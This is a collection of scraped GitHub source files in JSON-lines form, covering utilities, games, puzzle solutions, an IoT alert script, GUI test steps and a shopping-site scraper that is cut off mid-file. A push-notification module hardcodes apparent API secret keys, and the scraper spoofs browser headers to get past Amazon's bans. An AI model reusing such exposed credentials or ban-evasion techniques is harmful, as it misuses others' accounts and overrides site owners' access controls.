values[propName])\n return values[propName], True\n else:\n # self.here(self.id, itemId, propName, None)\n return None, False\n\n def setItemProperty(self, itemId, propName, value):\n props = self.itemProperties()\n if itemId in props:\n values = props[itemId]\n else:\n values = {}\n props[itemId] = values\n values[propName] = value\n self.setItemProperties(props, notify=False) # noop?\n item = self.scene().find(itemId)\n\n def resetItemProperty(self, prop):\n \"\"\" Called from Property.reset. \"\"\"\n props = self.itemProperties()\n itemProps = props.get(prop.item.id)\n if not itemProps:\n return\n changed = False\n if prop.name() in itemProps:\n del itemProps[prop.name()]\n changed = True\n if not itemProps:\n del props[prop.item.id]\n changed = True\n if changed:\n self.setItemProperties(props, notify=False)\n\n def resetAllItemProperties(self, notify=True, undo=None):\n for itemId, propValues in list(self.itemProperties().items()):\n item = self.scene().find(itemId)\n for propName in list(propValues.keys()):\n item.prop(propName).reset(notify=notify, undo=undo)\n self.setItemProperties({})\n\n\n","repo_name":"patrickkidd/familydiagram","sub_path":"pkdiagram/objects/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"43202396517","text":"from ntk.objects import gv as gv\nimport _help, requests, datetime\n\nfrom database.table import SyncResult, PaymentMethod\n\n\nclass Payment:\n def __init__(self, rself, *arg, **kwargs):\n super(Payment, self).__init__()\n self.arg = arg\n self.kwargs = kwargs\n self.rself = rself\n\n self.sync_down_payment_list(rself)\n\n def sync_down_payment_list(this, self):\n SyncResult().qset.update(**{'last_checked': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'status': 0, 'table_name': 'payment'}, where='table_name')\n\n try:\n data = {\"android\": 123}\n\n try:\n url = gv.website + \"app/paymentlist\"\n r = requests.post(url, data=data)\n paymentlist = r.json().get(\"data\").get(\"paymentinfo\")\n except:\n paymentlist = None\n\n if paymentlist:\n if gv.deep_sync:\n gv.rstatus_l.config(text=\"Deleting all records from payment method\")\n PaymentMethod().qset.delete_all()\n gv.rstatus_l.config(text=\"Deleted all records from payment method\")\n\n pcidl = [str(r['id']) for r in PaymentMethod().qset.filter(search='id').all()]\n cr_list, up_list = [], []\n\n for ix, c in enumerate(paymentlist):\n c['id'] = c.pop('payment_method_id')\n\n if gv.deep_sync:\n gv.rstatus_l.config(text=\"Adding record for payment method {} {}/{}\".format(c['payment_method'], ix+1, len(paymentlist)))\n cr_list.append(c)\n else:\n if c['id'] in pcidl:\n gv.rstatus_l.config(text=\"Updating record for payment method {} {}/{}\".format(c['payment_method'], ix+1, len(paymentlist)))\n up_list.append(c)\n else:\n gv.rstatus_l.config(text=\"Adding record for payment method {} {}/{}\".format(c['payment_method'], ix+1, len(paymentlist)))\n cr_list.append(c)\n\n if cr_list:\n PaymentMethod().qset.create_all(cr_list)\n if up_list:\n PaymentMethod().qset.update_all(up_list, where='id')\n\n SyncResult().qset.update(**{'last_update': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'status': 1, 'table_name': 'payment'}, where='table_name')\n\n except Exception as e:\n gv.error_log(str(e))\n","repo_name":"saif43/bhojon","sub_path":"database/synchronization/down/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"41102625560","text":"import requests\nfrom sys import argv\nfrom tqdm import tqdm\nimport socket\nimport os\nfrom notifypy import Notify\n\n# argv to range 1:1000 and --> string\n# download argv input and example --> bimax [link download]\n\nargvS = argv[1:700]\n\nif (str(argvS) ==\"[]\"):\n os.system(\"clear\")\n print(r\"\"\"\n .______ __ .___ ___. ___ ___ ___\n | _ \\ | | | \\/ | / \\ \\ \\ / /\n | |_) | | | | \\ / | / ^ \\ \\ V /\n | _ < | | | |\\/| | / /_\\ \\ > <\n | |_) | | | | | | | / _____ \\ / . \\\n |______/ |__| |__| |__| /__/ \\__\\ /__/ \\__\\\n\n [1] - Direct Download v1.01\n [2] - Download Anonymous v1.0.1\n \"\"\")\n try:\n NumberS = int(input(\"enter by number Downloader : \"))\n if NumberS == 1:\n url = str(input('enter link : '))\n name = url.split('/')[-1]\n\n\n notfiy = Notify()\n notfiy.message = f\"Downloading please wait...\"\n notfiy.title = name\n notfiy.icon = \"direct-download.png\"\n notfiy.send()\n\n\n respons = requests.get(url,stream=True)\n heead = int(respons.headers['Content-Length'])\n with open(name,'wb') as file:\n for data in tqdm(iterable=respons.iter_content(chunk_size=1024), total=heead / 1024, unit='KB'):\n file.write(data)\n\n elif NumberS == 2:\n url = str(input('enter link : '))\n name2 = url.split('/')[-1]\n\n notfiy2= Notify()\n notfiy2.message = f\"Downloading please wait...\"\n notfiy2.title = name2\n notfiy2.icon = \"direct-download.png\"\n notfiy2.send()\n\n ip_addr = socket.gethostname()\n hostname = socket.gethostbyname(ip_addr)\n respons = requests.get(url,stream=True,proxies={hostname:9050})\n heead = int(respons.headers['Content-Length'])\n\n with open(name2,'wb') as file:\n for data in tqdm(iterable=respons.iter_content(chunk_size=1024), total=heead / 1024, unit='KB'):\n file.write(data)\n\n except:\n print('error to download...')\n\n\nelse:\n try:\n\n name = argvS\n for i in name:\n pass\n si = str(i)\n print(si)\n\n notfiy3 = Notify()\n notfiy3.message = f\"Downloading please wait...\"\n notfiy3.title = si\n notfiy3.icon = \"direct-download.png\"\n notfiy3.send()\n\n respons = requests.get(si,stream=True)\n heead = int(respons.headers['Content-Length'])\n name_main = si.split('/')[-1]\n with open(name_main,'wb') as file:\n for data in tqdm(iterable=respons.iter_content(chunk_size=1024), total=heead / 1024, unit='KB'):\n file.write(data)\n except:\n pass\n","repo_name":"AhSiber/bimax-downloader","sub_path":"bimax-linux/bimax.py","file_name":"bimax.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"10281100436","text":"import random\r\nfrom random import randint\r\nimport traceback\r\n\r\ndef game():\r\n cara = \"-\" *36\r\n print(\"HI THERE\")\r\n print(cara)\r\n gennumber = str(random.randint(1000, 9999))\r\n gennumberarray = [int(i) for i in str(gennumber)]\r\n print(\"Solution key = \" + str(gennumber))\r\n print(\"I'VE GENERATED A RANDOM 4 DIGIT NUMBER FOR YOU.\")\r\n print(\"LET'S PLAY BULLS AND COWS GAME.\")\r\n print(cara)\r\n inputnumber = str(0)\r\n while inputnumber != gennumber:\r\n bulls = 0\r\n cows = 0\r\n x = 0\r\n y = 0\r\n i = 0\r\n\r\n try:\r\n inputnumber = int(input(\"ENTER A NUMBER: \"))\r\n\r\n except ValueError:\r\n print(\"Only number, please!\")\r\n return traceback.format_exc()\r\n\r\n\r\n print(cara)\r\n inputnumberarray = [int(i) for i in str(inputnumber)]\r\n if inputnumber >= 1000 and inputnumber <= 9999:\r\n\r\n while x != 4:\r\n if inputnumberarray[x] == gennumberarray[x]:\r\n bulls += 1\r\n x += 1\r\n\r\n i = len(list(set(inputnumberarray).intersection(gennumberarray)))\r\n\r\n cows = i - bulls\r\n if inputnumberarray == gennumberarray:\r\n print(\"YOU WIN\")\r\n break\r\n\r\n if bulls == 1:\r\n if cows == 1:\r\n print(str(bulls) + \" bull, \" + str(cows) + \" cow\")\r\n elif cows > 1 or cows == 0:\r\n print(str(bulls) + \" bull, \" + str(cows) + \" cows\")\r\n elif bulls > 1 or bulls <= 0:\r\n if cows == 1:\r\n print(str(bulls) + \" bulls, \" + str(cows) + \" cow\")\r\n elif cows > 1 or cows <= 0:\r\n print(str(bulls) + \" bulls, \" + str(cows) + \" cows\")\r\n elif inputnumber not in gennumber:\r\n print(\"Neplatná volba\")\r\n print(cara)\r\n\r\n elif inputnumber < 1000 or inputnumber > 9999:\r\n print(\"NUMBER WITH INCORRECT LENGHT INPUTTED!\")\r\n print(cara)\r\n\r\n break\r\n\r\n\r\n\r\ngame()","repo_name":"Petula24/Projekty","sub_path":"oprava_projekt_2.py.py","file_name":"oprava_projekt_2.py.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"40226097045","text":"class Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n p1, p2 = nums[0], nums[0]\n # python don't have do while\n # 找到两个指针的交点\n while True:\n p1 = nums[p1]\n p2 = nums[nums[p2]]\n if p1 == p2:\n break\n # 因为是确定有重复,所以这里不用else\n \n # 找到环的入口,解题方案真的贼像142\n # \n pt1, pt2 = nums[0], p2\n while pt1 != pt2:\n pt1 = nums[pt1]\n pt2 = nums[pt2]\n \n return pt1\n","repo_name":"huosan0123/leetcode-py","sub_path":"287.py","file_name":"287.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74216758217","text":"class Room(object):\n\n def __init__(self, x=0, y=0, description='', contains='', exits=None):\n\n self.x = x\n self.y = y\n self.description = description\n self.contains = contains\n if exits is None:\n self.exits = ['north','south','east','west']\n else:\n self.exits = exits\n\nclass Items(object):\n\n def __init__(self, name='', observe=''):\n self.name = name\n self.observe = observe\n\nclass SpecialItem(Items):\n\n def full_text(self):\n return \"{} - {}\".format(self.name, self.observe)\n","repo_name":"ChrisPwildcat/FirstGame","sub_path":"src/cp_game/definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"1735769445","text":"#Author : Dhanushkumar.M\n#project : Capstone Project for BOLT IOT certification\nimport conf, json, time, math, statistics\nfrom boltiot import Sms, Bolt\ndef send_telegram_message(message):\n url = \"https://api.telegram.org/\" + conf.telegram_bot_id + \"/sendMessage\"\n data = { \"chat_id\": conf.telegram_chat_id,\n \"text\": message\n }\n try:\n response = requests.request( \"GET\",\n url,\n params=data\n )\n print(\"This is the Telegram response\")\n print(response.text)\n telegram_data = json.loads(response.text)\n return telegram_data[\"ok\"]\n except Exception as e:\n print(\"An error occurred in sending the alert message via Telegram\")\n print(e)\n return False\ndef compute_bounds(history_data,frame_size,factor):\n if len(history_data)frame_size :\n del history_data[0:len(history_data)-frame_size]\n Mn=statistics.mean(history_data)\n Variance=0\n for data in history_data :\n Variance += math.pow((data-Mn),2)\n Zn = factor * math.sqrt(Variance / frame_size)\n High_bound = history_data[frame_size-1]+Zn\n Low_Bound = history_data[frame_size-1]-Zn\n return [High_bound,Low_Bound]\nmybolt = Bolt(conf.API_KEY, conf.DEVICE_ID)\nsms = Sms(conf.SSID, conf.AUTH_TOKEN, conf.TO_NUMBER, conf.FROM_NUMBER)\nhistory_data=[]\nwhile True:\n response = mybolt.analogRead('A0')\n data = json.loads(response)\n if data['success'] != 1:\n print(\"There was an error while retriving the data.\")\n print(\"This is the error:\"+data['value'])\n time.sleep(5)\n continue\n sensor_value1 = int(data['value'])\n Temperature = sensor_value1*0.0097\n print (\"The current Temparature of Refrigarator is \"+str(sensor_value1)+\" \"+ str(Temperature)+\" degree celsious \")\n sensor_value=0\n try:\n sensor_value = int(data['value'])\n except e:\n print(\"There was an error while parsing the response: \",e)\n continue\n bound = compute_bounds(history_data,conf.FRAME_SIZE,conf.MUL_FACTOR)\n if not bound:\n required_data_count=conf.FRAME_SIZE-len(history_data)\n print(\"Not enough data to computation. Need \",required_data_count,\" more data points\")\n history_data.append(int(data['value']))\n time.sleep(5)\n continue\n try:\n if sensor_value > bound[0] :\n Temperature = sensor_value*0.097\n print (\"bound[0] value is \"+ str(bound[0]))\n print (\"The Temparature level has been Incerased suddenly.Sending SMS\")\n response = sms.send_sms(\"Someone Opened the fridge door. The Current temperature is \" + str(Temperature)+ \" degree celsious\")\n message = \"Alert! The Temparature level has been Increased suddenly.The Current temperature is \" + str(Temperature)+ \" degree celsious \" \n telegram_status = send_telegram_message(message)\n print(\"This is the response for SMS & Telegram \",response, telegram_status)\n elif sensor_value < bound[1] :\n Temperature= sensor_value*0.097\n print (\"Anomaly is Occured due to sudden Change in Temperature\")\n print(\"Sending Alert!\")\n response = sms.send_sms(\"The temperature has decreased to : \"+str(Temperature)+\"degree celcius\")\n message = \"Alert! Sensor value has decreased The current value is \" + str(Temperature)\n telegram_status = send_telegram_message(message)\n print(\"The Status of SMS and Telegram:\",response, telegram_status)\n history_data.append(sensor_value);\n except Exception as e :\n print (\"Error\",e)\n time.sleep(5)\n\n","repo_name":"Dhanushkumar-M/Capstone-Project","sub_path":"anomaly_detection.py","file_name":"anomaly_detection.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"27283611213","text":"# Use modern Python\n\nfrom django.contrib.auth.models import User\nfrom django.core.management import BaseCommand\n\nfrom django_prbac.models import Grant, Role, UserRole\n\nfrom corehq import privileges\n\n\nclass Command(BaseCommand):\n help = 'Grants the user(s) specified the DIMAGI_OPERATIONS_TEAM privilege'\n\n def add_arguments(self, parser):\n parser.add_argument(\n 'usernames',\n nargs=\"*\",\n )\n parser.add_argument(\n '--remove-user',\n action='store_true',\n default=False,\n help='Remove the users specified from the DIMAGI_OPERATIONS_TEAM privilege',\n )\n\n def handle(self, usernames, **options):\n ops_role = Role.objects.get_or_create(\n name=\"Dimagi Operations Team\",\n slug=privileges.OPERATIONS_TEAM,\n )[0]\n accounting_admin = Role.objects.get_or_create(\n name=\"Accounting Admin\",\n slug=privileges.ACCOUNTING_ADMIN,\n )[0]\n if not ops_role.has_privilege(accounting_admin):\n Grant.objects.create(\n from_role=ops_role,\n to_role=accounting_admin,\n )\n remove_user = options['remove_user']\n\n for username in usernames:\n try:\n user = User.objects.get(username=username)\n try:\n user_role = UserRole.objects.get(user=user)\n except UserRole.DoesNotExist:\n user_privs = Role.objects.get_or_create(\n name=\"Privileges for %s\" % user.username,\n slug=\"%s_privileges\" % user.username,\n )[0]\n user_role = UserRole.objects.create(\n user=user,\n role=user_privs,\n )\n\n if remove_user:\n try:\n # remove grant object\n grant = Grant.objects.get(\n from_role=user_role.role,\n to_role=ops_role\n )\n grant.delete()\n print(\"Removed %s from the operations team\"\n % user.username)\n except Grant.DoesNotExist:\n print(\"The user %s was never part of the operations \"\n \"team. Leaving alone.\" % user.username)\n elif not user_role.has_privilege(ops_role):\n Grant.objects.create(\n from_role=user_role.role,\n to_role=ops_role,\n )\n print(\"Added %s to the operations team\" % user.username)\n else:\n print(\"User %s is already part of the operations team\"\n % user.username)\n\n except User.DoesNotExist:\n print(\"User %s does not exist\" % username)\n","repo_name":"dimagi/commcare-hq","sub_path":"corehq/apps/accounting/management/commands/add_operations_user.py","file_name":"add_operations_user.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":472,"dataset":"github-code","pt":"45"} +{"seq_id":"14814608479","text":"class Solution(object):\n def longestMountain(self, arr:List[int]):\n up= [0] * len(arr)\n down= [0] * len(arr)\n for i in range( len(arr)-1):\n if arr[i+1] > arr[i]:\n up[i+1] = up[i] + 1\n print(up[i+1])\n \n print(up)\n for i in range(len(arr) - 2,-1,-1):\n print(i)\n if arr[i] > arr[i + 1]: \n down[i] = down[i + 1] + 1\n\n maxx=0\n for u,d in zip(up,down):\n if u!=0 and d!=0:\n maxx=max(maxx,u+d+1)\n return maxx\n\n \n ","repo_name":"Rio3210/LeetCode_solutions","sub_path":"0845-longest-mountain-in-array/0845-longest-mountain-in-array.py","file_name":"0845-longest-mountain-in-array.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"12570715389","text":"#Program to find the roots of a quadratic eqn\r\nimport os \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\r\nimport math\r\na,b,c = eval(input(\"enter the coefficients of the quadratic equation \\n\"))\r\ne=(b**2)-(4*a*c)\r\nprint (\"discriminant D =\",e)\r\n\r\nif a==0 :\r\n\tprint (\"this is not a quadratic equation how ever the root is =\",-c/b)\r\nelif e==0 :\r\n\tprint (\"the roots is real and unique \",-b/(2*a))\r\nelif e>0 :\r\n\tprint (\"the roots are real and distinct\",(-b+math.sqrt(e))/(2*a), \"and\", (-b-math.sqrt(e))/(2*a))\r\nelse :\r\n\tprint (\"the roots are imaginary \",(-b+math.sqrt(-e))/(2*a), \"i and\",(-b-math.sqrt(-e))/(2*a), \"i\" )\r\n\r\nos.system(\"pause\")\r\n","repo_name":"vkgudelli/coding","sub_path":"python/quadraticEq.py","file_name":"quadraticEq.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"25724428094","text":"\n# -*- coding: utf-8 -*-\n\nimport ctypes\nfrom apps.sentry.utils.xg_push import xinge\nfrom apps.sentry.utils.bd_push import Channel\nimport os,time\nfrom apps.common.utils.xutil import is_digit\nimport logging\nlogger = logging.getLogger('qding')\n\n\n\nSERVICE_PROVIDERS = {\n 'BD': {\n 'type': 0,\n 'api_key': 'hWgk7lCY5SGFEEvauGV3cwCv',\n 'secret_key': 'h31ihzVjfe7qVEkiD4HjvN1GhgQzgnoq',\n },\n\n 'XG': {\n 'type': 1,\n 'api_key': 2100096723,\n 'secret_key': '8d511a768774c9743e995615224d3aaf',\n },\n}\n\nENCRYPT_KEY = 0x8DF8A035\nDLL_PATH = os.path.abspath(os.path.dirname(__file__))+os.sep+'libqdkey.so'\n\n\ndef PushMsg(msg, tag):\n ch = Channel.Channel(SERVICE_PROVIDERS['BD']['api_key'], SERVICE_PROVIDERS['BD']['secret_key'])\n cnt=ch.pushMessage(Channel.Channel.PUSH_TO_TAG, msg, str(time.time()), { Channel.Channel.TAG_NAME: tag })\n if not cnt:PushMsg(msg, tag)\n \n\ndef mac_to_hash(mac,qr_server_id):\n if mac=='0000':return mac\n mac_str=''\n if not mac or qr_server_id is None:return mac_str\n libfunc=ctypes.CDLL(DLL_PATH)\n p_mac_str=ctypes.create_string_buffer(mac.replace(':','').encode('utf8'),16)\n p_output_mac_str=ctypes.create_string_buffer(8)\n out_len=libfunc.qdhash_str(p_mac_str,p_output_mac_str,int(qr_server_id))\n if out_len !=-1:mac_str=p_output_mac_str[0:4].decode('utf8')\n return mac_str\n\ndef pack_message(codeIndex,enc_key):\n encCodeIndex=\"\"\n if not codeIndex or enc_key is None:return encCodeIndex\n try:\n libfunc = ctypes.CDLL(DLL_PATH)\n p_msg_str = ctypes.create_string_buffer(codeIndex.encode('utf8'))\n p_encry_byte = ctypes.create_string_buffer(1024*16)\n out_len = libfunc.qdmenc_str(p_msg_str,p_encry_byte,1024*16,int(enc_key,16))\n \n if out_len>0:\n encCodeIndex=p_encry_byte[0:out_len].decode('utf8','ignore')\n return encCodeIndex.replace('\\x00','')\n except:\n return \"\"\n\n\ndef unpack_message(encCodeIndex,dec_key):\n decCodeIndex=\"\"\n if not encCodeIndex or not dec_key:return decCodeIndex\n libfunc = ctypes.CDLL(DLL_PATH)\n p_encry_byte = ctypes.create_string_buffer(encCodeIndex.encode('utf8'))\n p_decry_byte = ctypes.create_string_buffer(1024*16)\n out_len = libfunc.qdmdec_hex_str(p_encry_byte,p_decry_byte,1024*16,int(dec_key,16))\n \n if out_len>0:\n decCodeIndex=p_decry_byte[0:out_len].decode('utf8','ignore')\n return decCodeIndex.replace('\\x00','')\n\n\n","repo_name":"webvul/qding","sub_path":"qdmgr_sentry/apps/sentry/utils/qd_push/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20879910337","text":"from typing import Any, List, Optional, Dict\nfrom warnings import warn\n\nimport numpy as np\n\nfrom utils.evaluation.prophesee.evaluation import evaluate_list\n\n\nclass PropheseeEvaluator:\n LABELS = 'lables'\n PREDICTIONS = 'predictions'\n\n def __init__(self, dataset: str, downsample_by_2: bool):\n super().__init__()\n assert dataset in {'gen1', 'gen4'}\n self.dataset = dataset\n self.downsample_by_2 = downsample_by_2\n\n self._buffer = None\n self._buffer_empty = True\n self._reset_buffer()\n\n def _reset_buffer(self):\n self._buffer_empty = True\n self._buffer = {\n self.LABELS: list(),\n self.PREDICTIONS: list(),\n }\n\n def _add_to_buffer(self, key: str, value: List[np.ndarray]):\n assert isinstance(value, list)\n for entry in value:\n assert isinstance(entry, np.ndarray)\n self._buffer_empty = False\n assert self._buffer is not None\n self._buffer[key].extend(value)\n\n def _get_from_buffer(self, key: str) -> List[np.ndarray]:\n assert not self._buffer_empty\n assert self._buffer is not None\n return self._buffer[key]\n\n def add_predictions(self, predictions: List[np.ndarray]):\n self._add_to_buffer(self.PREDICTIONS, predictions)\n\n def add_labels(self, labels: List[np.ndarray]):\n self._add_to_buffer(self.LABELS, labels)\n\n def reset_buffer(self) -> None:\n # E.g. call in on_validation_epoch_start\n self._reset_buffer()\n\n def has_data(self):\n return not self._buffer_empty\n\n def evaluate_buffer(self, img_height: int, img_width: int) -> Optional[Dict[str, Any]]:\n # e.g call in on_validation_epoch_end\n if self._buffer_empty:\n warn(\"Attempt to use prophesee evaluation buffer, but it is empty\", UserWarning, stacklevel=2)\n return\n\n labels = self._get_from_buffer(self.LABELS)\n predictions = self._get_from_buffer(self.PREDICTIONS)\n assert len(labels) == len(predictions)\n metrics = evaluate_list(result_boxes_list=predictions,\n gt_boxes_list=labels,\n height=img_height,\n width=img_width,\n apply_bbox_filters=True,\n downsampled_by_2=self.downsample_by_2,\n camera=self.dataset)\n return metrics\n","repo_name":"uzh-rpg/RVT","sub_path":"utils/evaluation/prophesee/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"45"} +{"seq_id":"3037519544","text":"from behave import step\n\nfrom misttests.integration.gui.steps.buttons import click_button_from_collection\n\nfrom selenium.common.exceptions import TimeoutException\n\nfrom selenium.webdriver.common.by import By\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n@step('I expect for \"{modal_id}\" modal to {action} within max {seconds} '\n 'seconds')\ndef modal_waiting_with_timeout(context, modal_id, action, seconds):\n if action == 'appear':\n try:\n WebDriverWait(context.browser, int(seconds)).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, '#' + modal_id)))\n except TimeoutException:\n raise TimeoutException(\"Modal %s did not %s after %s seconds\"\n % (modal_id, action, seconds))\n elif action == 'disappear':\n try:\n WebDriverWait(context.browser, int(seconds)).until(\n EC.invisibility_of_element_located((By.CSS_SELECTOR, '#' + modal_id)))\n except TimeoutException:\n raise TimeoutException(\"Modal %s did not %s after %s seconds\"\n % (modal_id, action, seconds))\n else:\n raise ValueError(\"Action can be either appear or disappear. Duh!\")\n\n\n@step('I click the \"{text}\" button inside the \"{modal_id}\" modal')\ndef click_button_within_modal(context, text, modal_id):\n try:\n modal = context.browser.find_element(By.CSS_SELECTOR, '#' + modal_id)\n buttons = modal.find_elements(By.CSS_SELECTOR, \"paper-item\")\n click_button_from_collection(context, text, buttons,\n 'Could not find %s button in %s '\n 'modal' % (text, modal_id))\n return\n except:\n assert False, \"Could not find modal with id %s\" % modal_id\n","repo_name":"mistio/mist.tests","sub_path":"misttests/integration/gui/steps/modals.py","file_name":"modals.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"7233217386","text":"from itertools import combinations\n\ndef solution(numbers):\n answer = []\n\n p = list(combinations(numbers, 2))\n\n for a, b in p:\n temp = a + b\n answer.append(temp)\n\n answer = list(set(answer))\n answer.sort()\n\n return answer\n\nprint(solution([2,1,3,4,1]))\nprint(solution([5,0,2,7]))","repo_name":"bae1022/Coding-Test","sub_path":"Programmers/두 개 뽑아서 더하기.py","file_name":"두 개 뽑아서 더하기.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5979806576","text":"print('{:^40}'.format('Exercício 42'))\nprint('Analisando Triângulo')\nprint('Refaço o DESAFIO 035 dos triângulos, acrescentando o recurso\\n'\n 'de mostrar que tipo de triângulo será formado:\\n'\n\n 'EQUILÁTERO: todos os lados iguais\\n'\n 'Isósceles: dois lados iguais\\n'\n 'Escaleno: todos os lados diferentes\\n')\nwhile True:\n try:\n a = float(input('Primeiro segmento: '))\n b = float(input('Segundo segmento: '))\n c = float(input('Terceiro segmento: '))\n if a < b + c and b < a + c and c < a + b:\n print('Os segmentos acima podem formar um triângulo ', end='')\n if a == b == c:\n print('EQUILATERO!')\n elif a == b or b == c or c == a:\n print('ISÓSCELES!')\n elif a != b != c != a:\n print('ESCALENO!')\n else:\n print('Não temos um triângulo.')\n except:\n print('Digite um numero válido!')\n","repo_name":"renatanunes03/Python-Mundo-02","sub_path":"Exercicios/ex042 - Analisando Triangulo.py","file_name":"ex042 - Analisando Triangulo.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"28406922927","text":"\nimport smbus \nimport time \nimport sys \nbus = smbus.SMBus(1) \naddress = 0x04 # Arduino I2C Address \n\ndef main(): \n i2cData = False \n while 1: \n # send data \n i2cData = not i2cData \n bus.write_byte(address,i2cData) \n \n data = int(bus.read_byte(address)/2)\n # request data \n # print (\"Arduino answer to RPi:\", data) \n \n time.sleep(1)\n return(data)\n \nif __name__ == '__main__': \n try: \n main() \n except KeyboardInterrupt: \n gpio.cleanup() \n sys.exit(0)","repo_name":"Barry1596/Charging-Station-GUI","sub_path":"Charger-Terminal-GUI/I2Cardu2.py","file_name":"I2Cardu2.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11197502817","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom bs4 import BeautifulSoup, SoupStrainer\nimport requests\n\nHEADERS = ({'User-Agent':\n 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36', \n 'Accept-Language': 'en-US, en;q=0.5'})\nheaders = {\n 'authority': 'www.amazon.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'dnt': '1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'sec-fetch-site': 'none',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-dest': 'document',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n}\n\nproduct_number = 12\n\ndef interface(request):\n if request.method == 'POST':\n product_name = request.POST['product_name']\n amazon_list = amazon_getSearchResult(product_name)\n ebay_list = ebay_getSearchResult(product_name)\n #recommend_list = getRecommendation(amazon_list + ebay_list)\n return render(request, 'products.html', {'product_name': product_name, 'amazon_list':amazon_list, 'ebay_list': ebay_list})\n else:\n return render(request, 'products.html')\n\n\n##########################################################\n# Recommend Result #######################################\n##########################################################\n#def getRecommendation(amazon_list):\n\n##########################################################\n# Amazon Product Result ##################################\n# [url, title, price, rating, review]#####################\n##########################################################\ndef amazon_getSearchResult(product_name):\n url = 'https://www.amazon.com/s?k=' + product_name.replace(' ', '+') + '&ref=nb_sb_noss_1'\n webpage = requests.get(url, headers = headers)\n soup = BeautifulSoup(webpage.content, \"lxml\", parse_only=SoupStrainer(\"a\", {'class':'a-link-normal s-no-outline'}))\n links = soup.find_all(\"a\", attrs={'class':'a-link-normal s-no-outline'})[0:15]\n product_list = []\n count = product_number\n for link in links: \n link = \"https://www.amazon.com\" + link.get('href')\n product_list.append(amazon_product(link))\n if (count <= 0):\n break\n else: \n count -= 1\n if not product_list:\n print(\"\\nWARNING: The user agent might have been temporarily banned. Please replace the HEADERS with a valid one, or try again later.\\n\")\n product_list = [[\"https://developers.whatismybrowser.com\", \"Empty\", \"Empty\", \"Empty\"]]\n return product_list\n\ndef amazon_product(url):\n webpage = requests.get(url, headers=headers)\n soup = BeautifulSoup(webpage.content, \"lxml\", parse_only=SoupStrainer([\"span\", \"title\"]))\n title = get_title(soup)\n price = get_price(soup)\n rating = get_rating(soup)\n review = get_reviewNum(soup)\n return [str(url), title, price, rating, review]\n\ndef get_title(soup):\n try: \n title = soup.find(\"span\", attrs={\"id\":'productTitle'}).text.replace('\\n', '').replace('\\'', '')\n except: \n try: \n title = soup.find(\"span\", attrs={\"class\": 'a-size-large qa-title-text'}).text.replace('\\n', '').replace('\\'', '')\n except: \n try: \n title = soup.title.string.replace('Amazon.com', '')\n except:\n title = \"N/A\"\n return title\n\ndef get_price(soup):\n try:\n price = soup.find(\"span\", attrs={'id':'priceblock_ourprice'}).string.strip()\n except:\n try: \n price = soup.find(\"span\", attrs={'class': 'a-offscreen'}).string\n except: \n price = \"N/A\"\n return price\n\ndef get_rating(soup):\n try:\n rating = soup.find(\"span\", attrs={'class':'a-icon-alt'}).string.strip()\n except:\n rating = \"\"\n return rating\n\ndef get_reviewNum(soup): \n try:\n review = soup.find(\"span\", attrs={'id':'acrCustomerReviewText'}).string.strip()\n except:\n review = \"\"\n return review\n\n##########################################################\n# eBay Product 